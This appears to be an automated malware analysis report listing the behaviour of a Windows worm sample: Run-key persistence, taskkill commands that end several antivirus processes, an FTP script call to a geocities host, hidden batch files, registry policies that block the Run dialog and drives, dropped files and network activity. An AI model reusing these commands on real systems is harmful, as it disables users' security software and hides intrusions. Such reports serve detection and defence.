Technical Information
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'MSN Messenger' = '<SYSTEM32>\Setup\Messenger.vbs'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'msg' = 'c:\msg.vbs'
- Registry Editor (RegEdit)
- <SYSTEM32>\taskkill.exe /f /im mcagent.exe
- <SYSTEM32>\taskkill.exe /f /im pavcl.com
- <SYSTEM32>\taskkill.exe /f /im bdnagent.exe
- <SYSTEM32>\taskkill.exe /f /im mcdetect.exe
- <SYSTEM32>\taskkill.exe /f /im PavFires.exe
- <SYSTEM32>\ftp.exe -s:c:\ftp.txt ftp.de.geocities.com
- <SYSTEM32>\rundll32.exe <SYSTEM32>\shimgvw.dll,ImageView_Fullscreen %TEMP%\29.jpg
- <SYSTEM32>\taskkill.exe /f /im AVENGINE.exe
- <SYSTEM32>\taskkill.exe /f /im apvxdwin.exe
- <SYSTEM32>\taskkill.exe /f /im avpcc.exe
- <SYSTEM32>\taskkill.exe /f /im navw32.exe
- <SYSTEM32>\wscript.exe "C:\mail.vbs"
- <SYSTEM32>\taskkill.exe /f /im avpm.exe
- <SYSTEM32>\taskkill.exe /f /im savscan.exe
- <SYSTEM32>\taskkill.exe /f /im bdswitch.exe
- %WINDIR%\regedit.exe /s c:\kazaa.reg
- <SYSTEM32>\taskkill.exe /f /im navapw32.exe
- <SYSTEM32>\taskkill.exe /f /im navapsvc.exe
- <SYSTEM32>\attrib.exe +h +s c:\d.bat
- <SYSTEM32>\cmd.exe /c ""%TEMP%\11.bat" 0"
- <SYSTEM32>\attrib.exe +h c:\hotcakes.log
- <SYSTEM32>\ntvdm.exe -f -i2
- <SYSTEM32>\cmd.exe /c ""%TEMP%\13.bat" 0"
- <SYSTEM32>\cmd.exe /c ""%TEMP%\9.bat" 0"
- <SYSTEM32>\cmd.exe /c ""%TEMP%\3.bat" 0"
- <SYSTEM32>\ntvdm.exe -f -i1
- <SYSTEM32>\cmd.exe /c ""%TEMP%\7.bat" 0"
- <SYSTEM32>\cmd.exe /c ""%TEMP%\5.bat" 0"
- <SYSTEM32>\ntvdm.exe -f
- <SYSTEM32>\wscript.exe "%TEMP%\23.vbs" 0
- <SYSTEM32>\ntvdm.exe -f -i4
- <SYSTEM32>\attrib.exe +h +s c:\b.bat
- <SYSTEM32>\attrib.exe +h +s %WINDIR%\girl99.bat
- %WINDIR%\regedit.exe /s c:\msg.reg
- <SYSTEM32>\attrib.exe +h +s c:\boy.bat
- <SYSTEM32>\attrib.exe +h +s %WINDIR%\handgun.bat
- <SYSTEM32>\ntvdm.exe -f -i3
- AVPCC.EXE
- NAVAPW32.EXE
- MCAGENT.EXE
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRun' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoDrives' = '03FFFFFF'
- %WINDIR%\Temp\scsA.tmp
- %TEMP%\29.jpg
- <Current directory>\UDE
- C:\i
- C:\X.vbs
- %WINDIR%\Temp\scs9.tmp
- %TEMP%\25.scr
- <Current directory>\u
- %WINDIR%\Temp\scs7.tmp
- %TEMP%\27.exe
- %WINDIR%\Temp\scs8.tmp
- C:\h
- <SYSTEM32>\msnmsgr.vbe
- %WINDIR%\system\msnmsgr.vbe
- %ALLUSERSPROFILE%\Desktop\MSN Messenger.lnk
- %WINDIR%\msdbgsrv.dll
- <SYSTEM32>\Setup\Messenger.vbs
- %ALLUSERSPROFILE%\Desktop\Internet Explorer.lnk
- C:\k
- C:\MSOCache\C.Vitae.vbe
- C:\o
- <SYSTEM32>\IEXPLORE.vbe
- <SYSTEM32>\msn.vbe
- %TEMP%\11.bat
- %TEMP%\9.bat
- C:\hotcakes.log
- <Current directory>\m
- %TEMP%\13.bat
- %TEMP%\7.bat
- %TEMP%\3.bat
- %TEMP%\1.exe
- %WINDIR%\Temp\scs1.tmp
- %WINDIR%\Temp\scs2.tmp
- %TEMP%\5.bat
- %TEMP%\15.EXE
- %WINDIR%\Temp\scs5.tmp
- %TEMP%\21.exe
- %WINDIR%\Temp\scs6.tmp
- %TEMP%\23.vbs
- <Current directory>\w
- <Current directory>\2
- %TEMP%\17.EXE
- <Current directory>\4
- %WINDIR%\Temp\scs3.tmp
- %WINDIR%\Temp\scs4.tmp
- %TEMP%\19.exe
- %TEMP%\19.exe
- %TEMP%\21.exe
- %TEMP%\15.EXE
- %TEMP%\17.EXE
- %TEMP%\27.exe
- %TEMP%\29.jpg
- %TEMP%\23.vbs
- %TEMP%\25.scr
- %TEMP%\5.bat
- %TEMP%\7.bat
- %TEMP%\1.exe
- %TEMP%\3.bat
- %TEMP%\13.bat
- C:\hotcakes.log
- %TEMP%\9.bat
- %TEMP%\11.bat
- %WINDIR%\Temp\scsA.tmp
- <Current directory>\u
- %WINDIR%\Temp\scs8.tmp
- %WINDIR%\Temp\scs9.tmp
- C:\kazaa.reg
- C:\ftp.txt
- C:\i
- C:\h
- %WINDIR%\Temp\scs3.tmp
- %WINDIR%\Temp\scs4.tmp
- %WINDIR%\Temp\scs1.tmp
- %WINDIR%\Temp\scs2.tmp
- <Current directory>\w
- %WINDIR%\Temp\scs7.tmp
- %WINDIR%\Temp\scs5.tmp
- %WINDIR%\Temp\scs6.tmp
- 'localhost':1037
- 'ft#.##.geocities.com':21
- DNS ASK ft#.##.geocities.com
- ClassName: 'ShImgVw:CPreviewWnd' WindowName: ''
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-c38.c40.400007'
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-c18.c1c.3b0006'
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-b84.b88.3e0009'
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-b18.b20.370001'
- ClassName: 'RegEdit_RegEdit' WindowName: ''
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-bb8.bbc.3f000a'